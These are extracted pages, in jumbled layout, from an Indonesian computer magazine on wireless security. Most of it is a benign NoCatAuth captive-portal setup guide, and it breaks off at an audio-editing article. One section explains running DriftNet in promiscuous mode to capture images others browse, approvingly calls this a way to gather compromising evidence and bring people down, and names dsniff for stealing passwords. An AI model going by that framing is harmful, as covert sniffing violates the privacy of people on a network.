Terakhir tab Filter yang dapat mengatur paket data apa saja yang ingin dicapture untuk kemudian dianalisa.

Tab Graphs, Channels, Signal, dan Log.

Tab Filter.

NeoTek Vol. IV No. 04

NeoStart
Ethernet Sniffer dan Scanner
Selain AiroPeek NX yang memang khusus dirancang sebagai wireless sniffer, wireless network juga merupakan suatu ethetnet network, sehingga dapat juga ditelaah menggunakan ethernet sniffer seperti ethereal, tcpdump atau windump, serta tentunya dsniff untuk mengendus password. Ethereal, tcdpdump, windump, dan dsniff pernah dibahas di NeoTek II/7 (Packet Sniffing) dan III/4 (Packet Sniffing terhadap Clear Text Protocol). Wireless network juga dapat diperiksa menggunakan port scanner seperti nmap, SuperScan, maupun scanner terhadap network neighborhood seperti Legion 2.1 ataupun SMB Scanner. Wireless network sama rentannya terhadap penyusupan, bahkan sebenarnya lebih rentan dibandingkan wired network, sebab dengan menggunakan WLAN card anda bisa terasosiasi pada suatu wireless network dan menjadi bagian dari network itu (menjadi ‘orang dalam’ dan serangan bisa dilakukan dari balik NAT). Itulah sebabnya WEP encryption, walaupun dikatakan banyak kekurangannya, tetap penting untuk diterapkan dalam wireless network, agar paling tidak jangan sampai memudahkan sembarang orang (yang sangat mungkin bukan hacker) masuk ke wireless network anda. Terlebih lagi bila mengingat perilaku wireless connection pada Windows XP yang tanpa minta ijin langsung saja mengkoneksi ke wireless network terkuat yang ditemukannya. Software menarik ini adalah salah satu alasan kuat untuk belajar Linux sebab E hanya ada di Macintosh (EtherPEG) D dan Linux (DriftNet). Untuk mencoba DriftNet paling mudah adalah dengan menggunakan Linux Mandrake 9.2, sebab semua dependencies yang diperlukan untuk menginstal DriftNet sudah terdapat semua pada Linux Mandrake 9.2. Anda tinggal meng-klik file RPM dari DriftNet saja, yang dapat di-download di sini (atau dapatkan dalam CD NeoTek):
http://rpmfind.net/linux/RPM/mandrake/9.2/ contrib/i586/driftnet-0.1.6-1mdk.i586.html

Menjalankan DriftNet Berikut ini ditunjukkan bagaimana ‘berbahayanya’ DriftNet dalam membongkar ‘rahasia’ esek-esek anda. Setelah DriftNet terinstal pada Linux Mandrake 9.2 (gunakan rpmdrake, sehingga tinggal menggunakan klik mouse saja), jalankan dengan terlebih dahulu mengaktifkan console, misalnya xterm dengan cara mengetikkan Alt-F2 untuk memunculkan jendela Run Program dan ketikkan xterm dan klik Run.

Login sebagai root dan melihat opsi-opsi DriftNet dengan perintah #driftnet -h

Misalkan anda ingin men-sniff WLAN card (atau ethernet card biasa) eth0 dengan metode verbose (menunjukkan detail kegiatannya), maka yang perlu anda ketikkan sebagai super user: #driftnet -i eth0 -v

Tekan Alt-F2 untuk mengaktifkan jendela Run Command, lalu ketikkan xterm.

Pada jendela xterm ketikkan su lalu masukkan root password (menjalankan DriftNet harus login sebagai root).

Akan tampil jendela kosong dan informasi bahwa DriftNet sudah diaktifkan dalam promiscuous mode. Selanjutnya jalankan Konqueror web browser dan masuk ke situs esek-esek.

Multimedia Sniffer
Kalau melihat sulitnya memahami hasil tangkapan AiroPeek NX ataupun Ethereal (kecuali dsniff yang terangterangan dirancang untuk mencuri password), maka tidak terlalu dirasakan bahayanya sniffer. Tapi tunggu dulu! Kiranya hampir tidak ada dari kita yang belum pernah secara diam-diam mampir ke situs esek-esek, apalagi kalau malam sudah semakin larut. Tahukah anda bahwa kini sudah terdapat sniffer yang kerjanya adalah mensniff suatu network dan secara otomatis menyimpan gambar (juga musik dan video) yang sedang di-browse? Cara yang sangat mudah untuk mengumpulkan bukti kurang fit and propernya seseorang dalam hal moralitas. Teknik idaman untuk menjatuhkan orang sekarang ini.

DriftNet mengumpulkan gambar hasil sniffing pada jendela ataupun pada file.

Vol. IV No. 04 NeoTek

19

NeoStart

Otentikasi dengan NoCatAuth
Sebagai penutup rangkaian wireless security Onno W. Purbo (onno@indo.net.id) membahas wi-fi dari sisi penyedia infrastruktur wi-fi, yaitu membahas captive portal untuk melakukan otentikasi terhadap user, tanpa mengandalkan WEP encryption yang keamanannya tidak terjamin.
wi-fi, terutama yang membuka akses untuk umum, seperti hotspot, adalah otentikasi pengguna. Captive portal menjadi mekanisme populer bagi infrastruktur komunitas wi-fi dan operator hotspot yang memberikan otentikasi bagi penguna infrastruktrur maupun manajemen flow IP, seperti, traffic shaping, dan kontrol bandwidth, tanpa perlu menginstalasi aplikasi khusus di komputer pengguna. Proses otentikasi secara aman dapat dilakukan melalui sebuah web browser biasa di sisi pengguna.

WI R E LE SS S E C U R IT Y

S

ALAH SATU MASALAH TERBESAR BAGI INFRASTRUKTUR

Konsep Captive Portal
Captive portal juga berpotensi untuk mengijinkan kita melakukan berbagai hal secara aman melalui SSL & IPSec dan mengset rule quality of service (QoS) per user, tapi tetap mempertahankan jaringan yang sifatnya terbuka di infrastruktur wi-fi. Jadi ide dasar captive portal sebetulnya cukup sederhana. Daripada kita tergantung pada mekanisme keamanan builtin di peralatan WiFi 802.11b untuk mengontrol siapa saja yang dapat berasosiasi ke Access Point, dengan menggunakan Captive portal kita mengkonfigurasi agar Access Point bekerja tanpa WEP dan merupakan network yang terbuka. Access Point bekerja pada mode bridge (bukan router), dan tersambung melalui kabel LAN ke sebuah router Linux. Router Linux yang akan memberikan IP melalui DHCP

bagi semua wireless node yang tergabung, termasuk mengatur bandwidth dari masing-masing wireless node selain mengatur siapa yang boleh bergabung siapa yang tidak. Router Linux disini berfungsi sebagai wireless gateway yang menjadi perantara antara infrastruktur wirelesss dengan Internet. Pada saat seorang pengguna berusaha untuk melakukan browsing ke Internet, captive portal akan memaksa pengguna yang belum terotentikasi untuk menuju ke authentication web dan akan di beri prompt login termasuk informasi tentang hotspot yang sedang dia gunakan. Jika Linux router/wireless gateway mempunyai mekanisme untuk menghubungi sebuah authentication server untuk mengetahui identitas dari pengguna wireless yang tersambung, maka wireless gateway akan dapat menentukan untuk membuka aturan firewall-nya untuk pengguna tertentu. Kita juga dapat mengatur lebar bandwidth untuk pengguna tertentu, mengatur mesin/port mana yang dapat dihubungi.

NoCatAuth: Open Source Captive Portal
h Pada bagian ini akan dibahas NoCatAuth (http://nocat.net), sebuah sistemthird party authentication. NoCatAuth ditulis menggunakan Perl dan C, dan berfungsi mengatur proses pemberian login prompt ke pengguna, menghubungi database pengguna, dapat berupa database MySQL atau file password, untuk dilihat kredibilitas pengguna tersebut.

Berbagai Open Source Captive Portal

1

NoCatAuth
Mendukung Linux/iptables dan OpenBSD/pfctl. Mendukung mode otentikasi yang dikonfirmasi ke berbagai backend, termasuk MySQL database, PAM, RADIUS, LDAP, dll. Mendukung feature untuk nonauthenticating open mode yang cukup membaca Acceptable Usage Policy dan langsung dapat menggunakan jaringan.

2

NoCatSplash
Dimaksudkan sebagai generasi lebih lanjut dari NoCatAuth, semua proses gateway dan file data hanya sekitar 200-250Kbyte sehingga sangat cocok untuk peralatan embedded.

3

OpenGate
Opengate adalah GPL, dijalankan di FreeBSD. Menggunakan Java applet untuk menjaga agar sambungan tetap terbuka.

20

NeoTek Vol. IV No. 04

NeoStart
Kemudian NoCat akan secara aman menghubungi gateway wireless tentang status pengguna tersebut, dan memberikan otorisasi untuk akses lebih lanjut. Pada sisi gateway, NoCat akan mengatur sambungan lokal, men-set bandwidth dan aturan firewall, dan juga men-time out login jika pengguna tidak aktif dalam waktu tertentu. NoCat sendiri dilepas menggunakan lisensi GPL seperti halnya Linux. Paket program NoCatAuth terdiri dari dua (2) komponen utama, yaitu, SATU buah System Authentication yang terpusat dan BANYAK Wireless Gateway yang berbicara dengan authentication system tersebut. NoCat sendiri sangat visionary untuk menjadi backbone otentikasi/keabsahan di belakang jaringan wireless komunitas terutama yang sekarang beroperasi di Amerika Serikat. Sebuah grup komunitas dimungkinkan untuk me-maintain database user NoCat. Komunitas NoCat sendiri sangat aktif untuk mengintegrasikan semua database member dari berbagai komunitas wireless untuk menjadi sebuah jaringan wireless komunitas yang besar. Bagi mereka yang tertarik untuk membuat perjanjian roaming antar berbagai komunitas ini dapat mengirimkan e-mail ke authservice@nocat.net NoCat bukan satu-satu-nya sistem otentikasi open source. Daftar dari captive portal open source dapat diperoleh dari http://www.personaltelco.net/index.cgi/PortalSoftware. Beberapa diantaranya adalah: h • NoCatAuth (http://nocat.net/download/NoCatAuth/) adalah captive portal favorite saya. NoCat ditulis menggunakan Perl. h • NoCatSplash (http://nocat.net/download/NoCatSplash/). Ditulis dalam bahasa C. • Opengate dikembangkan di Saga University, Jepang h (http://www.cc.saga-u.ac.jp/opengate/index-e.html). h • WiCap (http://www.geekspeed.net/wicap/) • StockholmOpen h (http://software.stockholmopen.net/index.shtml). h • OpenSplash (http://opensplash.qalab.com/) Sebuah tutorial yang baik tentang cara menginstalasi gateway Authentikasi ditulis oleh Nathan Zorn: Authentication Gateway HOWTO h (http://www.itlab.musc.edu/~nathan/authentication_gateway/). Nathan menggunakan PAM LDAP module untuk menginsert aturan iptables.

Proses Koneksi Secara Umum
Seorang pengguna yang sedang roaming akan berasosiasi dengan Access Point. Kemudian pengguna wireless tersebut meminta IP address dari gateway menggunakan protokol DHCP. Gateway (atau Access Point) akan segera memberikan penyewaan DHCP dan alokasi IP address. Semua IP address yang belum terotentikasi akan terkena firewall sehingga hanya dapat digunakan di segmen wireless saja. Semua akses melewati gateway akan diblokir. Pada saat pengguna membuka browser untuk mengakses web, browser mereka akan di-redirect ke gateway. Gateway kemudian akan me-redirect permohonan akses Web ke halaman login Authentication system menggunakan SSL sesudah menambahkan token random dan beberapa informasi lainnya ke kalimat URL yang digunakan.

4

WiCap
Ditulis oleh Brain Caswell dalam Perl dan dijalankan di OpenBSD.

5

StockholmOpen
Dibuat oleh Royal Institute of Technology in Stockholm, Swedia. System ini netral operator, mengijinkan pengguna untuk mengakses berbagai upstream provider. Implementasi dalam C, menggunakan PAM di Linux/FreeBSD. Lisensi yang digunakan adalah BSD.

6

OpenSplash
Dikembangkan oleh Aleksandr Melentiev dari San Francisco Wireless yang terinspirasi oleh kesederhanaan wicap. Dirancang untuk dijalankan di FreeBSD menggunakan Perl dan ipfw.

Vol. IV No. 04 NeoTek

21

NeoStart
Sertikat SSL yang terdaftar di Certificate Authority diperlukan untuk produksi, karena keseluruhan keamanan system tergantung padanya. Sebuah sertifikat yang tidak terdaftar akan menyebabkan Security Alert dan memungkinkan seseorang untuk untuk men-spoof servis otentikasi. Pada saat percobaan, kita dapat saja menekan tombol Yes jika memperoleh security Alert demikian untuk melanjutkan transaksi.

Gateway wireless NoCat mempunyai pilihan untuk menset aturan Quality of Service (QoS). Hal ini memungkinkan agar gateway mengalokasikan besaran bandwidth yang berbeda untuk pengguna yang berbeda. Misalnya pengguna roaming yang terdaftar sebagai anggota akan memperoleh bandwidth lebih daripada pengguna tamu yang anonymous.

Pengguna kemudian akan diberikan tiga (3) pilihan, yaitu: login dengan username dan password yang sudah di-set sebelumnya, atau klik ke link tentang cara menjadi anggota atau pilihan terakhir menekan tombol Skip Login. Bagi mereka login ke infrastruktur akan diotentikasi terhadap database yang ada di authentication server, apakah itu RADIUS, MySQL, LDAP dll. Sesudah pengguna login dengan baik atau skip proses login, sistem Otentikasi akan mengeluarkan message yang ditandatangani dengan PGP, dan mengirimkannya ke gateway wireless. Menggunakan copy dari PGP public key Authentication server, gateway wireless dapat memverifikasi message tersebut. Oleh karena-nya cukup sulit bagi penyerang yang ingin melakukan replay attack. Adanya tanda tangan digital mencegah kemungkinan mesin lain berpura-pura menjadi authentication server dan mengirimkan message palsu ke wireless gateway. Setelah semua berjalan dengan lancar, gateway wireless akan memodifikasi aturan firewallnya dan memberikan ijin kepada pengguna untuk akses lebih lanjut. Pengguna akan di redirect ke situs yang mereka ingin browse di awal. IP security sebetulnya sudah lumayan kompleks. NoCat menambah kompleksitas dengan adanya aturan firewall yang dinamis oleh pengguna wireless yang sifatnya anonymous. Oleh karena itu perlu dilakukan untuk mengisolasi jaringan wireless dari jaringan yang lain untuk meminimalkan risiko keamanan.
22

Pada titik ini pengguna sudah dapat menggunakan infrastruktur. Setiap X jam/hari captive portal akan mencek daftar semua IP yang diijinkan melewati firewall, terutama dari pengguna yang terauthentikasi, dan cek untuk meyakinkan bahwa mereka masih diijinkan untuk mengakses: • Jika mereka masih mengakses, bagus, dan dapat dilanjutkan terus. • Jika mereka tidak lagi mengakses, maka hilangkan IP tersebut dari daftar. Biarkan lain kali jika akan mengakses harus login kembali. Agar hubungan ke Internet di pengguna tetap terbuka, sebuah windows kecil di sisi klien akan dibuka (menggunakan JavaScript). Script tersebut akan me-refresh halaman login setiap beberapa menit. Jika pengguna lepas dari jangkauan Access Point atau menekan tombol Logout di agen login NoCat, sambungan akan ter-reset dan mengharuskan pengguna untuk login kembali.

NeoTek Vol. IV No. 04

NeoStart
Kebutuhan Software
Download Nocat Kebutuhan Software Gateway • Linux 2.4.x dengan iptables. Biasanya sudah tersedia di Linux Mandrake 9.1. • gpgv, adalah sebuah PGP signature verifier. gpgv biasanya merupakan bagian dari paket gnupg, yang dapat di ambil di http://www.gnupg.org/download.html. Semua sudah tersedia di Linux Mandrake 9.1. • Kadang-kadang kita butuh menjalankan dhcpd di mesin gateway. Alternatif lain, kita dapat meminta Access Point atau DHCP server lain di jaringan untuk menjalankan pekerjaan tersebut. • Jika kita ingin mencoba aturan bandwidth throttling rules, kita juga membutuhkan tool 'tc' dari paket iproute2. Dapat di ambil di ftp://ftp.inr.ac.ru/ip-routing/ • Direkomendasikan untuk menjalankan local caching DNS server. Kebutuhan Authentication Server Software • Webserver dengan SSL yang diaktifkan. Apache + mod_ssl biasanya tersedia di Linux Mandrake 9.1. Untuk sistem produksi, lebih disukai jika sertifikat SSL tersebut terdaftar. • Perl 5 (5.6 atau yang lebih baik). Biasanya sudah tersedia di Linux Mandrake 9.1. • Modul perl Digest::MD5, DBI, dan DBD::MySQL. Dapat di ambil dari CPAN. Tapi sudah tersedia di Linux Mandrake 9.1. • Gnu Privacy Guard (gnupg 1.0.6 atau yang lebih baik), biasanya tersedia di http://www.gnupg.org/download.html. Biasanya tersedia di Linux Mandrake 9.1. • Untuk proses Authentication sederhana, kita dapat dapat menggunakan file password lokal sebagai sumber authentication. Tetapi, jika kita ingin berpartisipasi dalam kerjasama roaming dengan berbagai group wireless, kita membutuhkan database MySQL 3.23.4x atau yang lebih baik. NoCatAuth juga dikembangkan untuk bekerja dengan berbagai sumber aauthentikasi, seperti, Radius, PAM, LDAP dll. Sertifikat SSL yang terdaftar di Certificate Authority sangat dibutuhkan dalam sistem produksi. Seluruh keamanan sistem tergantung pada sertikat SSL. Tentunya pendaftaran dapat dilakukan setelah semua proses instalasi dilakukan. Sebagai alternatif, kita dapat mengcopy sertifikasi authentication server ke semua client di awal.

Instalasi Gateway
Instalasi cepat Software NoCat gateway dirancang untuk dijalankan di mesin dengan spesikasi rendah. Sebuah 486/50 dengan 32MB RAM harusnya lebih dari cukup. Cara instalasi cepatnya adalah sebagai berikut:
$ su # tar zvxf NoCatAuth-x.xx.tar.gz # cd NoCatAuth-x.xx # make gateway # cd /usr/local/nocat # vi nocat.conf # bin/gateway

Kita jelas sangat membutuhkan NoCat Authentication System. NoCatAuth system pada saat ini dalam proses pengembangan yang sangat aktif. Kita dapat dengan mudah mengambil-nya dari http://nocat.net. Saya menggunakan Linux Mandrake 9.1 untuk bereksperimen. Linux Mandrake 9.1 mempunyai hampir semua software yang dibutuhkan untuk operasi Gateway dan Authentication service. Untuk Authentication Server, beberapa perl script, seperti Net::IMAP:Simple.pm dan Net::Netmask.pm, masih perlu di ambil dari CPAN http://seach.cpan.org.

Jika software gateway dioperasikan, kita harusnya melihat
[2003-09-28 08:38:27] Resetting firewall. [2003-09-28 08:38:27] Binding listener socket to 0.0.0.0

Vol. IV No. 04 NeoTek

23

NeoStart
Instalasi Rinci Gatekeeper Software gateway dirancang untuk dijalankan di mesin standalone. Proses gateway akan meng-overwrite semua rule firewall yang sebelumnya didefinisikan pada saat dia berjalan. Sebaiknya menjalankan gateweay di mesin sendiri, sebelum menjalankan di firewall jaringan yang ada dan beroperasi. • Kemampuan root dibutuhkan untuk menjalankan gateway. • Tar NoCatAuth
$ tar zvxf NoCatAuth-x.xx.tar.gz

Kadang-kadang kita akan memperoleh masalah pada saat menjalankan NoCat terutama jika di-instalasi pada direktori yang tidak standard, seperti, /usr/local/nocat. NoCat perlu pengetahui lokasi: (a) perl library-nya, dan (b) file konfigurasi nocat.conf. Jika direktori non-standard yang digunakan, konfigurasi nocat.conf harus dilakukan secara benar atau kita dapat menambahkan variabel PERL5LIB dan NOCAT di lingkungan shell sebelum menjalankan script gateway, supaya:
$ export PERL5LIB=/path/to/nocat/lib:$PERL5LIB $ export NOCAT=/path/to/nocat/nocat.conf

• Path default instalasi adalah /usr/local/nocat, kita dapat mengubahnya melalui parameter INST_PATH diMakefile jika diperlukan. • Dari direktori NoCatAuth, jalankan make gateway. Gateway software akan diinstalasi. • Edit file /usr/local/nocat/nocat.conf sesuai dengan kebutuhan. Parameter yang perlu diedit adalah:
• • InternalDevice adalah nama interface dari card wireless LAN yang kita gunakan, atau ethernet card yang tersambung ke Access Point. ExternalDevice harus di-set sesuai sama interface jaringan yang berbicara ke Internet. Dapat berupa card ethernet yang tersambung ke modem DSL atau cable modem, atau dialup device: eth1, ppp0, dll. LocalNetwork perlu di-set sesuaikan dengan network address dan network mask dari internal wireless network. Biasanya berbentuk 111.222.333.444/255.255.255.0, atau 11.22.33.44/24, dll. DNSAddr perlu di-set sama dengan domain name server address yang di sebarkan oleh DHCP server, jika dan hanya jika kita menggunakan DNS di luar LocalNetwork. Jika, kita menjalankan caching DNS server di gateway atau di salah satu node di jaringan wireless, kita dapat membiarkan parameter ini di-commented. GatewayMode dapat dipilih antara mode Open, Passive, dan Captive. Tidak ada proses otentikasi pada setting gateway yang open. AuthServiceAddr, AuthServiceURL, dan LogoutURL tergantung pada servis otentikasi yang kita pilih. Diasumsikan kita menggunakan Passive atau Captive GatewayMode. IncludePorts dan ExcludePorts digunakan untuk membatasi port TCP yang dapat diakses oleh pengguna umum, misalnya, untuk tidak mengijinkan pengguna untuk mengirimkan traffic e-mail.

Di Linux Mandrake, utility seperti iptables, modprobe, dan gpgv biasanya sudah tersedia di $PATH. Jika mereka belum ada di $PATH, kita perlu menambahkan:
$ export PATH=$PATH:/sbin:/usr/sbin:/usr/local/sbin

Mengkonfigurasi DHCP Server di Gateway
Kadang kala kita ingin menjalankan server DHCP di Gateway. Setelah diinstalasi dengan benar dari source RPM, file konfigurasi DHCP server dapat ditemukan di /etc/dhcpd.conf. Sebuah contoh konfigurasi DHCP server untuk memberikan IP address dalam jangkauan 192.168.1.110 sampai 192.168.1.155 terlihat di bawah ini:
ddns-update-style none; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; # default gateway option routers 192.168.1.5; option subnet-mask 255.255.255.0; option domain-name-servers 10.2.2.3,10.2.2.4; range dynamic-bootp 192.168.1.110 192.168.1.155; default-lease-time 21600; max-lease-time 43200; }

• • •

Setelah DHCP server terkonfigurasi, kita perlu menjalankan DHCP server secara otomatis pada saat booting. Di Linux Mandrake, hal ini dapat dilakukan melalui:
# chkconfig dhcpd on # service dhcpd start

Kita perlu mencek ulang dan meyakinkan bahwa DHCP server yang dioperasikan memberikan DNS address yang sama dengan yang tercantum di nocat.conf (jika kita menggunakan external DNS). Jika tidak maka wireless client yang digunakan tidak akan dapat me-resolve DNS.

Menjalankan Gateway
Pada prompt root, menjalankan gateway sesederhana
# /usr/local/nocat/bin/gateway

Instalasi Authentication Server
Instalasi authentication server hanya diperlukan jika kita menginginkan menjalankan Authentication Service sendiri untuk jaringan kita. Bagi infrastruktur wi-fi komunitas, NoCat memberikan service authentication untuk publik di auth.nocat.net. Instalasi Cepat Bagi ingin cepat menginstalasi, ikuti langkah-langkah berikut:
$ su # tar zvxf NoCatAuth-x.xx.tar.gz # cd NoCatAuth-x.xx # make authserv # make pgpkey # cd /usr/local/nocat # vi nocat.conf # chown apache.apache /usr/local/nocat/pgp # chown apache.apache /usr/local/nocat/pgp/* # vi /etc/httpd/conf/httpd.conf # service httpd restart

atau
# /path/to/nocat/bin/gateway

Kita harus menggunakan root untuk menjalankan NoCat gateway untuk dapat meng-update aturan firewall. Agar service gateway dapat berjalan secara automatis pada saat boot, cek script etc/nocat.rc. Instalasinya dilakukan dengan mengcopy etc/nocat.rc ke /etc/rc.d/init.d, atau dapat juga membuat command yang memanggilnya di rc.local, atau symlink ke runlevel, seperti:
# ln -s /etc/rc.d/init.d/nocat.rc /etc/rc.d/rc3.d/S99nocat

Menjalankan /bin/gateway sebagai root akan memberikan message seperti,
[2003-09-28 08:38:27] Resetting firewall. [2003-09-28 08:38:27] Binding listener socket to 0.0.0.0

Selamat! Gateway harusnya sudah berjalan dengan baik.
24

Perhatikan bahwa tidak ada script yang harus di eksekusi, yang perlu kita lakukan adalah me-restart Web server.

NeoTek Vol. IV No. 04

NeoStart
Instalasi Secara Rinci Authentication server dirancang untuk dijalankan pada mesin standalone. Proses instalasi-nya sebagai berikut, • Buka NoCatAuth
$ tar zvxf NoCatAuth-x.xx.tar.gz

• Copy /usr/local/nocat/trustedkeys.gpg ke semua gateway (atau /usr/local/nocat/gw/pgp). Jika hal ini tidak kita lakukan, otentikasi akan looping dan kita akan mendapat Bad authentication message di gateway log. • Restart Apache web server
# service httpd restart

• Path default instalasi adalah /usr/local/nocat, kita dapat menggantinya melalui parameter INST_PATH diMakefile jika diperlukan. • Dari direktori NoCatAuth, jalankan make authserv. Kita akan menginstal servis Authentikasi. • Jalankan make pgpkey. Parameter default sudah cukup baik untuk aplikasi umumnya. Untuk menghindati halhal yang aneh bin ajaib waktu authentication server ingin meng-enkrip message, jangan masukkan passphrase waktu make pgpkey. • Edit file /usr/local/nocat/nocat.conf sesuai kebutuhan. Parameter yang diperlukan adalah:
DataSource: Saat ini, harus DBI atau Passwd. Gunakan DBI untuk MySQL, atau Passwd untuk otentikasi yang berbasis file password lokal.

That's it. Cek log anda, sabar dan fun. Jika anda menjalankan Authentication Service untuk sendiri, anda perlu bergabung di mailing list NoCat. Detail-nya tersedia secara online di http://nocat.net/. Tambahkan konfigurasi Apache untuk Authentication Service
NameVirtualHost * <VirtualHost 10.10.10.16:443> DocumentRoot /usr/local/nocat/htdocs # ServerName localhost:443 # ServerAdmin root@localhost SSLEngine On SSLCertificateFile /etc/ssl/apache/server.crt SSLCertificateKeyFile /etc/ssl/apache/server.key Options FollowSymLinks Includes Indexes MultiViews ScriptAlias /cgi-bin/ /usr/local/nocat/cgi-bin/ <Directory "/usr/local/nocat/htdocs"> AllowOverride All Options FollowSymLinks Includes Indexes MultiViews <Limit GET POST OPTIONS PROPFIND> Order allow,deny Allow from all </Limit> <LimitExcept GET POST OPTIONS PROPFIND> Order deny,allow Deny from all </LimitExcept> </Directory> <Directory "/usr/local/nocat/cgi-bin"> AllowOverride All Options ExecCGI <IfModule mod_access.c> Order allow,deny Allow from all </IfModule> # # $PERL5LIB tells Perl where to find the NoCat libraries. SetEnv PERL5LIB /usr/local/nocat/lib # # $NOCAT tells NoCat where to find its configuration file. SetEnv NOCAT /usr/local/nocat/nocat.conf SSLOptions +StdEnvVars </Directory> <IfModule mod_setenvif.c> SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-uncleanshutdown \ downgrade-1.0 force-response-1.0 </IfModule> <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit </IfModule> </VirtualHost>

Jika anda menggunakan DBI, maka Database, DB_User, dan DB_Passwd akan dibutuhkan. Database dapat di-set untuk full dbi string, seperti:
dbi:mysql:database=nocat;host=my.dbhost.net

DB_User dan DB_Passwd adalah db username dan password. Jika anda menggunakan Passwd sebagai DataSource, UserFile, akan dibutuhkan GroupUserFile, dan GroupAdminFile. Path default-nya harusnya OK. • Membuat sumber otentikasi sendiri, dan menambahkan user.
DBI: Pertama-tama, buat database baru (dengan 'mysqladmin create nocat', misalnya.) Kemudian, import table schemas dari etc/nocat.schema, seperti:
$ mysql nocat < etc/nocat.schema

Harusnya anda tidak memperoleh error di sini. Jika ada error, pastikan bahwa anda memasukan informasi host dan user dengan benar; atau cek instalasi mysql. Jalankan bin/admintool untuk membuat user baru dan group admin. Passwd: Default file password yang kosong telah tersedia. Cukup jalankan bin/admintool untuk membuat user baru dan group admin.

• LocalGateway harus di-set ke IP address gateway jika kita ingin menjalankan Authentication service di subnet atau mesin yang sam. Opsi ini membutuhkan modul Perl Net::Netmask yang ada di CPAN (http://www.cpan.org). h • Kita perlu memastikan bahwa /usr/local/nocat/pgp dan pgp/* dimiliki oleh user yang menjalankan Web server. Di Linux Mandrake 9.1, Apache berjalan di bawah user apache dan group apache.
# chown apache.apache /usr/local/nocat/pgp # chown apache.apache /usr/local/nocat/pgp/*

Menjalankan Authentication Server di Mesin Gateway
Sebetulnya sama sekali tidak direkomendasikan menjalankan servis otentikasi di mesin gateway. Sebuah gateway akan melewatkan paket yang dari user yang belum terotentikasi untuk berinteraksi dengan Authentication Server. Sedang servis otentikasi membawa banyak informasi yang sangat sensitif seperti password dan private key. Oleh karena itu gateway bukanlah tempat yang baik bagi Authentication Service yang banyak mempunyai informasi sensitif. Walaupun demikian, NoCatAuth sebenarnya dapat menjalankan Authentication Service dan gateway di mesin yang sama; hanya berbeda home directory, misalnya: /usr/local/nocat/authserv dan /usr/local/nocat/gateway. Vol. IV No. 04 NeoTek
25

Distribusi Linux lain mungkin www; kadang-kadang nobody. • Kita perlu menambahkan konfigurasi Web dari Authentication Service ke konfigurasi Apache. Contoh dari konfigurasi Web Authentication terlampir di bawah bagian ini. Kita perlu mengcek path dan IP address yang sesuai dengan setting yang ada. Di Linux Mandrake 9.1, konfigurasi tersebut dapat ditambahkan ke
/etc/httpd/conf/httpd.conf

atau,
/etc/httpd/conf/vhost/Vhost.conf

NeoStart
Tanpa memodifikasi Makefile, kita dapat melakukan:
$ make PREFIX=/usr/local/nocat/gw gateway $ make PREFIX=/usr/local/nocat/authserv authserv $ make PREFIX=/usr/local/nocat/authserv pgpkey $ cp /usr/local/nocat/authserv/trustedkeys.gpg /usr/local/nocat/gw/pgp

Setelah semua selesai dikonfigurasi, kita dapat menjalankan gateweay dengan me-run
/usr/local/nocat/gw/bin/gateway.

Database NoCat
Bagi mereka yang menggunakan database MySQL sebagai authentication database, kita butuh melihat dan memodifikasi database jika dibutuhkan. Di Linux Mandrake, hal ini sangat mudah dilakukan melalui Webmin. NoCat database di MySQL dapat diakses melalui:
https://auth-server-ip:10000 ' Servers ' MySQL ' nocat

Kita akan melihat beberapa tabel di NoCat database, seperti, • Eventlog • Hardware • Member • Network • Node

Tampak pada gambar adalah tampilan tabel data. Kita ada beberapa opsi untuk bekerja dengan tabel tersebut, seperti, edit selected row, add row, atau delete selected row. Sebagai contoh, sesudah kita klik Add row, kita akan dapat menambahkan data baru ke tabel. Tampak pada gambar adalah hasil screen capture untuk menambahkan anggota baru ke tabel.

Daftar anggota tersedia di database member. Database akan menyimpan beberapa informasi tentang anggota di tabelnya, seperti, url, description, created, modified, status, login, pass, dan name. Melihat dan memodifikasi data, dapat dilakukan melalui menu View Data di bagian Edit Table. Di NoCat, proses registrasi dapat pula dilakukan melalui Web interface.

26

NeoTek Vol. IV No. 04

NeoStyle

Audio Editing (Pinnacle Studio 8)
Andi Ismayadi (Fuzk3_kendi@yahoo.com) meneruskan bahasan mengenai editing, kali ini rincian mengenai audio editing menggunakan Pinnacle studio 8. Sebelumnya dibahas dulu mengenai digitalisasi audio analog lengkap dengan penyiapan kabelnya.
editing dengan Pinnacle Studio 8, dan kita telah mengetahui secara umum fasilitas apa saja yang terdapat di dalamnya. Sekarang kita akan membahas satu per satu bagian-bagian video editing itu. Setelah sebelumnya kita bisa memasukkan lagu atau suara ke dalam video, kali ini kita akan mempelajari audio editing. Kita akan mempelajari bagaimana kita ingin lagu nostalgia kita dapat menjadi bagian dari video. Anda dapat mencari CD ataupun MP3-nya. Tapi, apabila lagu itu sudah tidak diproduksi dan hanya ada dalam koleksi kaset lama anda. Bagaimana cara mendigitalisasinya? Yang anda perlukan adalah sebuah kabel input-output yang dapat anda beli pada toko-toko elektronik; harganya sekitar Rp 15.000,- Anda juga dapat membuatnya sendiri dengan memanfaatkan kabel microphone atau jack audio 1/8 inch yang sudah tidak terpakai lagi. Apabila anda ingin mentransfer lagu kaset dari Walkman, buatlah suatu kabel sepanjang 1,5 m dengan ujung jack audio 1/8 inch dari kabel bekas tadi. Kupas pelapisnya tapi jangan sampai tembaganya putus, lalu sambungkan ke jack yang satu sebagai output dan satunya lagi sebagai Input. Jadi ada satu jack di suatu ujung dan di ujung lainnya yang berlawanan. Apabila anda ingin mentransfer dari VCD ataupun dari tape anda yang memiliki Output Right-Left audio tape (kabel

BA S I C V I D E O E D I T I N G

S

ETELAH KITA TELAH MENGETAHUI GARIS BESAR VIDEO

